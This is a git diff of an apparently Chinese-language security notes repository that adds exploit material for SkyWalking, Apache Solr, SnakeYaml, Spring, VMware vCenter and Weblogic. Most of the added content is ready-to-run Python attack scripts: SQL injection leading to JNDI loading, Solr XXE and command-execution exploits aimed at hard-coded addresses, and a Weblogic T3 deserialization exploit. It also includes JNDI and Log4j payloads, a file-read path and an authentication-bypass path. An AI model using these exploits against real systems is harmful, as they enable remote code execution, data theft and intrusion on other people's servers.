"http://192.168.18.240:8080", "Connection": "close", + "Referer": "http://192.168.18.240:8080/log"} + +payload = 'CAFEBABE000000.............' +ClassName = 'Evil' +JndiUrl = 'ldap://0.0.0.0:8888' + + +def exp(burp0_url): + burp0_json1 = {"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select file_write('"+payload+"','"+ClassName+".class'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json1, verify=False, allow_redirects=False, timeout=2) + except: + pass + # 触发 + burp0_json2={"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','"+ClassName+"','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def jndi(burp0_url): + burp0_json = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", + "variables": {"condition": {"endpointId": "1", + "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','javax.naming.InitialContext','"+JndiUrl+"','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", + "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", + "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def fileTarget(file): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + jndi(url+'/graphql') + + +if __name__ == '__main__': + fileTarget('vulip.txt') diff --git a/SkyWalking/tool/scan.py b/SkyWalking/tool/scan.py new file mode 100644 index 0000000..77d860b --- /dev/null +++ b/SkyWalking/tool/scan.py @@ -0,0 +1,104 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import threading +import requests +import urllib3 + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 + +result = [] # 结果 + +info = 'Apache Skywalking 8.3.0 SQL Injection Vulnerability' + + +# 添加 +endpoints = [ + '/graphql', +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/json', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + 'http': '127.0.0.1:8080' +} + + +def save(result): + file = open('result.txt', 'w') + for line in result: + file.write(line + '\n') + file.close() + + +def Scan_http(url, socket_proxies): + FLAG = False + payload = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n queryLogs(condition: $condition) {\r\n total\r\n logs {\r\n serviceId\r\n serviceName\r\n isError\r\n content\r\n }\r\n }\r\n}\r\n", + "variables": {"condition": {"metricName": "sqli", "paging": {"pageSize": 10}, "state": "ALL"}}} + + for endpoint in endpoints: + try: + res = requests.post(url+endpoint, json=payload, headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if "sqli" in res.text and res.status_code == 200: + FLAG=True + result.append(url+' 存在'+info) + print(url+'\033[1;31m存在'+info+'\033[0m') + break + except: + pass + if not FLAG: + print(url+"扫描完成不存在漏洞") + + +def fileTarget(file, socket_proxies): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + Scan_http(url, socket_proxies) + save(result) + + +def multiRun(file, socket_proxies): + t = threading.Thread(target=fileTarget, args=(file, socket_proxies)) + t.start() + t.join() + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description=info+'scanner') + parser.add_argument('-f', default=None, help='read target url from file') + parser.add_argument('-u', default=None, help='target url') + parser.add_argument('-proxy', default=None, help='-proxy socks5://0.0.0.0:8088') + args = parser.parse_args() + socket_proxies = None + if args.proxy: + socket_proxies = { + 'http': args.proxy + } + if args.u: + Scan_http(args.u, socket_proxies) + exit(0) + if args.f: + multiRun(args.f, socket_proxies) + exit(0) + else: + parser.print_help() + exit(0) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index ec4c550..b14e92b 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -1,11 +1,15 @@ # snakeyaml ## 不出网利用 ->通过fastjson写文件如何本地加载rce +>通过写文件然后本地加载rce + +//todo 写一个工具 去完成 已经完成了 https://xz.aliyun.com/t/10655 +限制了class,不过存在class bean中有object属性 参考: https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ + 加载本地 ```java String data2 = "!!javax.script.ScriptEngineManager [\n" + @@ -19,3 +23,11 @@ String data2 = "!!javax.script.ScriptEngineManager [\n" + ```java String poc = "[!!判断的类全类名 []: 0, !!java.net.URL [null, \"http://ixvoxg.dnslog.cn\"]: 1]"; ``` + +## 其他链 一般是jndi + +``` +!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} +``` + +参考: https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E diff --git a/Solr/README.md b/Solr/README.md index 2edc0c1..cc7d06c 100644 --- a/Solr/README.md +++ b/Solr/README.md @@ -1,4 +1,191 @@ # Apache Solr漏洞 **Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。** +>Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 -Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 + +https://github.com/Imanfeng/Apache-Solr-RCE + +## CVE-2017-12629 + +[CVE-2017-12629 - Apache Solr XXE & RCE 漏洞分析](https://paper.seebug.org/425/) + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# xxe and rce +import requests +from urllib.parse import quote + +ip='101.35.196.173' +port='8983' + +''' + +"> +''' +def xxe(url): + exp = "%ext;%ent;]>&data;" + text = quote(exp, 'utf-8') + burp0_url = "http://"+ip+":"+port+"/solr/demo/select?q="+text+"&wt=xml&defType=xmlparser" + get = requests.get(burp0_url) + print(get.text) + +# 依据漏洞作者所披露的漏洞细节来看,RCE需要使用到SolrCloud Collections API,所以RCE只影响Solrcloud分布式系统。 +# /solr/admin/cores?wt=json 判断 +def rce(cmd):#不稳定,并且不知道路径 + burp0_url = "http://"+ip+":"+port+"/solr/demo/config" + burp0_headers = {"Accept": "*/*", "Accept-Language": "en", + "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", + "Connection": "close"} + burp0_json = { + "add-listener": {"args": ["-c", cmd], "class": "solr.RunExecutableListener", "dir": "/bin/", + "event": "postCommit", "exe": "sh", "name": "newlistener"}} + requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + + burp0_json2=[{"id": "test"}] + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2) + +if __name__ == '__main__': + # xxe("http://101.35.196.173:8080/do.dtd") + rce("touch /tmp/1") +``` + +## CVE-2019-0192 + +https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py + +## CVE-2019-0193 + +https://www.yuque.com/tianxiadamutou/zcfd4v/uyceyo#4785516e + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import requests +from urllib.parse import quote + +def getinfo(remote): + burp0_url = remote + "/solr/admin/cores?wt=json" + r = requests.get(burp0_url, verify=False, allow_redirects=False) + if r.status_code == 200: + a = list(r.json()['status'].keys()) + # ressource = "/solr/" + a[0] + "/config" + # print(ressource) + return a[0] + else: + exit(0) + +#需要出网 +def exp1(url,info,cmd): + burp0_url = url+"/solr/"+info+"/dataimport?_=1647571813629&indent=on&wt=json" + burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "Content-type": "application/x-www-form-urlencoded", "Connection": "close"} + burp0_data = {"command": "full-import", "verbose": "false", "clean": "false", "commit": "true", "debug": "true", + "core": "test", + "dataConfig": "\n \n \n \n \n \n", + "name": "dataimport"} + post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(post.json()['documents']) + +def exp2(url,info,cmd): + burp0url = url+"/solr/"+info+"/config" + headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", + "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", + "Content-Type": "application/json"} + burp0_json = {"set-property": {"requestDispatcher.requestParsers.enableStreamBody": True}} + requests.post(burp0url, headers=headers, json=burp0_json) + + exp=''' + + + + + + + + ''' + text = quote(exp, 'utf-8') + text ="%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22"+quote(cmd,'utf-8')+"%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73%75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52%65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c%74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%6e%61%6d%65%3d%22%65%6e%74%69%74%79%31%22%0a%20%20%20%20%20%20%20%20%64%61%74%61%73%6f%75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45%6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%22%0a%20%20%20%20%20%20%20%20%74%72%61%6e%73%66%6f%72%6d%65%72%3d%22%73%63%72%69%70%74%3a%70%6f%63%22%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%3c%66%69%65%6c%64%20%63%6f%6c%75%6d%6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%6c%65%22%20%2f%3e%0a%20%20%20%20%3c%2f%65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%0a%20%20%20%20%20%20%20%20%20%20%20" + burp0_url = url+"/solr/"+info+"/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig="+text + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", + "content-type": "multipart/form-data; boundary=------------------------aceb88c2159f183f"} + burp0_data = "\r\n--------------------------aceb88c2159f183f\r\nContent-Disposition: form-data; name=\"stream.body\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n--------------------------aceb88c2159f183f--" + requests_post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(requests_post.json()['documents']) + +if __name__ == '__main__': + info = getinfo("http://101.35.196.173:8983") + # exp1("http://101.35.196.173:8983",info,"ls /tmp/") + exp2("http://101.35.196.173:8983",info,'ls /tmp/') +``` + +**jndi注入** + +``` + + + + + + + +``` + +## CVE-2019-17558 + +https://github.com/jas502n/solr_rce + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 +import requests + +url ="http://101.35.196.173:8983" +cmd ="ls" + +burp0_url = url + "/solr/admin/cores?wt=json" +r = requests.get(burp0_url, verify=False, allow_redirects=False) +a = list(r.json()['status'].keys()) + +burp0_url = url+"/solr/"+a[0]+"/config" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/json"} +burp0_json={"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}} +requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + +burp0_url = url+"/solr/"+a[0]+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} +get = requests.get(burp0_url, headers=burp0_headers) +print(get.text) +``` + +## 任意文件删除 + +https://mp.weixin.qq.com/s/JXBiQR3q7ykITVFBwm_9Vg diff --git a/Spring/Readme.md b/Spring/Readme.md index 93a82aa..d48eb5c 100644 --- a/Spring/Readme.md +++ b/Spring/Readme.md @@ -4,3 +4,19 @@ + [cve-2016-4977]() + [cve-2017-4971]() + [cve-2018-1270]() + +## Spring Security ++ [Spring Security / MVC Path Matching Inconsistency(CVE-2016-5007)](https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173852&idx=1&sn=6b4a6c36c456b5e475b5247451c6dd81&chksm=833cf5aeb44b7cb895e1f67f8f6680e1a22124ce5e9e38d8a5e5321099f40e8acc01ac9e3c85&scene=4#wechat_redirect) + +``` +/%0dadmin +``` + ++ [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过漏洞与利用场景分析](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490023&idx=1&sn=f7e654f69ceca1ff437d9431bdd8ffa7&chksm=cefda0f3f98a29e5556a31b28ba231613e49b0ff40fcee651fac351adc6376e2ad2b72509dbf&mpshare=1&scene=23&srcid=0521LQrB49HRCgrnaPZOD2ys&sharer_sharetime=1653110684149&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + +原理就是默认情况下, 正则表达式中点(.)不会匹配换行符, 设置了Pattern.DOTALL模式, 才会匹配所有字符包括换行符。从而绕过 + +![image](https://user-images.githubusercontent.com/63966847/169652431-125a8ebd-251d-4fec-a8dd-be20a3c60da5.png) + + +小知识:[Java中正则表达式(regex)匹配多行(Pattern.MULTILINE和Pattern.DOTALL模式)](https://www.cjavapy.com/article/68/) diff --git a/Struts2/README.md b/Struts2/README.md index bbe2332..5f8b882 100644 --- a/Struts2/README.md +++ b/Struts2/README.md @@ -19,3 +19,8 @@ [漏洞版本](http://archive.apache.org/dist/struts/binaries/) ![](./img/环境.png) + +## TODO +分析各个s2 漏洞 +s2-62 和新的 [https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) + diff --git a/Undertow/Readme.md b/Undertow/Readme.md new file mode 100644 index 0000000..16d8a83 --- /dev/null +++ b/Undertow/Readme.md @@ -0,0 +1,5 @@ +# Undertow + +https://blog.csdn.net/hollis_chuang/article/details/104470945 + +http://blog.hubwiz.com/2016/12/01/webserver-Undertow/ diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md new file mode 100644 index 0000000..a4ff167 --- /dev/null +++ b/VMware vCenter/Readme.md @@ -0,0 +1,101 @@ +# vcenter + +### 版本查看 + +``` +/sdk/vimServiceVersions.xml +``` + +### VMware vCenter Server 任意文件读取漏洞 + +[VMware vCenter Server 任意文件读取漏洞](https://forum.90sec.com/t/topic/1582) + +endpoint +``` +/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties +``` + +### CVE-2021-21972 + +[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) + +[CVE-2021-21972 vCenter Server 文件写入漏洞分析](https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U1c +VMware vCenter Server 6.7系列 < 6.7.U3l +VMware vCenter Server 6.5系列 < 6.5 U3n +VMware ESXi 7.0系列 < ESXi70U1c-17325551 +VMware ESXi 6.7系列 < ESXi670-202102401-SG +VMware ESXi 6.5系列 < ESXi650-202102101-SG +``` + +endpoint + +``` +/ui/vropspluginui/rest/services/uploadova +``` + +### CVE-2021-21985 + +[CVE-2021-21985 VMware vCenter Server远程代码执行漏洞分析](https://www.ghtwf01.cn/2022/07/31/CVE-2021-21985%20VMware%20vCenter%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U2b +VMware vCenter Server 6.7系列 < 6.7.U3n +VMware vCenter Server 6.5系列 < 6.5 U3p +VMware Cloud Foundation 4.x 系列 < 4.2.1 +VMware Cloud Foundation 4.x 系列 < 3.10.2.1 +``` + +### CVE-2021-22005 + +[vCenter RCE 详细分析过程 (CVE-2021–22005)](https://cloud.tencent.com/developer/article/1887641) + +``` +VMware vCenter Server 7.0 +VMware vCenter Server 6.7 Running On Virtual Appliance +VMware Cloud Foundation (vCenter Server) 4.x +VMware Cloud Foundation (vCenter Server) 3.x +``` + +### Log4j + +endpoint + +``` +/websso/SAML2/SSO/vsphere.local?SAMLRequest= + +X-Forwarded-For: ${jndi:ldap://exp} +``` + + + +### CVE-2022-31680 + +[CVE-2022-31680](https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587) + +``` +GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1 +Host: 192.168.0.109 +Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Accept: application/json, text/plain, */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Pragma: no-cache +Isangularrequest: true +X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e +Referer: https://192.168.0.109/psc/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close +``` + +### 后续利用 + +[VMware vCenter漏洞实战利用总结](https://mp.weixin.qq.com/s/0gg5TDEtL3lCb9pOnm42gg) + +[Vcenter实战利用方式总结](https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499057&idx=1&sn=24ce83c75152529f2b8ef8543162a734&chksm=cfa55922f8d2d0349b97211fdf45df6c78b26ace580b68579817ed67760aaface17348529cf3&mpshare=1&scene=23&srcid=10245pAGxEFHmXFGCMoKjGdB&sharer_sharetime=1666572610152&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) diff --git a/Weblogic/Readme.md b/Weblogic/Readme.md index fa69759..b594381 100644 --- a/Weblogic/Readme.md +++ b/Weblogic/Readme.md @@ -1,539 +1,31 @@ # Weblogic ->文章内容参考:http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86 -> ->为了方便自己学习 +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86 -![image-20210815153940829](img/image-20210815153940829.png) +https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0 +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/ +https://y4er.com/post/weblogic-jrmp/ -## CVE-2015-4852 +http://drops.xmd5.com/static/drops/web-13470.html -InboundMsgAbbrev#readobject +https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704 -InboundMsgAbbrev#resolveClass +http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html +## 内存木马 +https://mp.weixin.qq.com/s/eI-50-_W89eN8tsKi-5j4g +https://www.shuzhiduo.com/A/gVdnM4685W/ -从入口点开始`weblogic.rjvm.InboundMsgAbbrev#readObject`方法开始。通过`read()`方法,读取T3数据流的序列化部分依次分块解析类。`InboundMsgAbbrev#resolveClass()`内部使用`Class.forName`来从类序列化获取到对应类的一个Class的对象。进行相对应的点实例化并读取了`AnnotationInvocationHandler`触发了此处CC1的利用链。最后在`AbstractMapDecorator#entrySet()`方法触发,达到了rce目的。 +https://xz.aliyun.com/t/10323#toc-49 -https://www.cnblogs.com/0x7e/p/14529949.html +https://github.com/Y4er/WebLogic-Shiro-shell +https://kuron3k0.github.io/2021/04/23/weblogic-memshell-1/ +https://kuron3k0.github.io/2021/04/29/weblogic-memshell-2/ -主要有以下几个部分组成: +https://www.cnblogs.com/bitterz/p/14970230.html -【数据包长度】【T3协议头】【反序列化标志】【数据】 - -00 00 0d cf 是数据包长度 - -通常在反序列化数据包中,`ac ed 00 05` 是反序列化标志,在 T3 协议中由于每个反序列化数据包前面都有 `fe 01 00 00` ,所以这里的标志相当于就是 `fe 01 00 00 ac ed 00 05` - -![image-20210815001234456](img/image-20210815001234456.png) - -```python -import socket -import sys -import struct -import re -import subprocess -import binascii - -def get_payload1(gadget, command): - JAR_FILE = '/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar' - popen = subprocess.Popen(['java', '-jar', JAR_FILE, gadget, command], stdout=subprocess.PIPE) - return popen.stdout.read() - -def get_payload2(path): - with open(path, "rb") as f: - return f.read() - -def exp(host, port, payload): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((host, port)) - - handshake = "t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n".encode() - sock.sendall(handshake) - data = sock.recv(1024) - pattern = re.compile(r"HELO:(.*).false") - version = re.findall(pattern, data.decode()) - if len(version) == 0: - print("Not Weblogic") - return - - print("Weblogic {}".format(version[0])) - data_len = binascii.a2b_hex(b"00000000") #数据包长度,先占位,后面会根据实际情况重新 - t3header = binascii.a2b_hex(b"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006") #t3协议头 - flag = binascii.a2b_hex(b"fe010000") #反序列化数据标志 - payload = data_len + t3header + flag + payload - payload = struct.pack('>I', len(payload)) + payload[4:] #重新计算数据包长度 - sock.send(payload) - -if __name__ == "__main__": - host = "127.0.0.1" - port = 7001 - gadget = "CommonsCollections1" #CommonsCollections1 Jdk7u21 - command = "touch /tmp/CVE-2015-4852" - - payload = get_payload1(gadget, command) - exp(host, port, payload) -``` - -### 修复 - -补丁:2016年1月 p21984589_1036_Generic -修复方法是在resolveClass中引入了 ClassFilter.isBlackListed进行过滤,跟进weblogic.rmi.ClassFilter可以看到黑名单内容。 - -## CVE-2016-0638 - -weblogic.jms.common.StreamMessageImpl没在黑名单,在其反序列化时会读取一段数据并进行反序列化,我们可以把这段数据伪造成rce payload。 - -![image-20210815103726507](img/image-20210815103726507.png) - -乱入一个QA -Q:StreamMessageImpl可以过黑名单很好理解,但是为啥CommonsCollections1依旧可以成功,CommonsCollections1(org.apache.commons.collections.functors)不是在黑名单里面吗? - -A:答案是ServerChannelInputStream没有过滤到org.apache.commons.collections.functors(废话)。细节是这样的:ServerChannelInputStream的resolveClass检验到是StreamMessageImpl,不在黑名单里面,通过。然后在反序列化流程中会调用StreamMessageImpl的readExternal,readExternal内部又new了新的ObjectInputStream(以后简称ois)并从缓冲区读反序列化数据再次调用readObject,这里原生的ois就是原生的resolveClass方法没有过滤。 - -**有点类似二次反序列化利用。。** - -```java -import 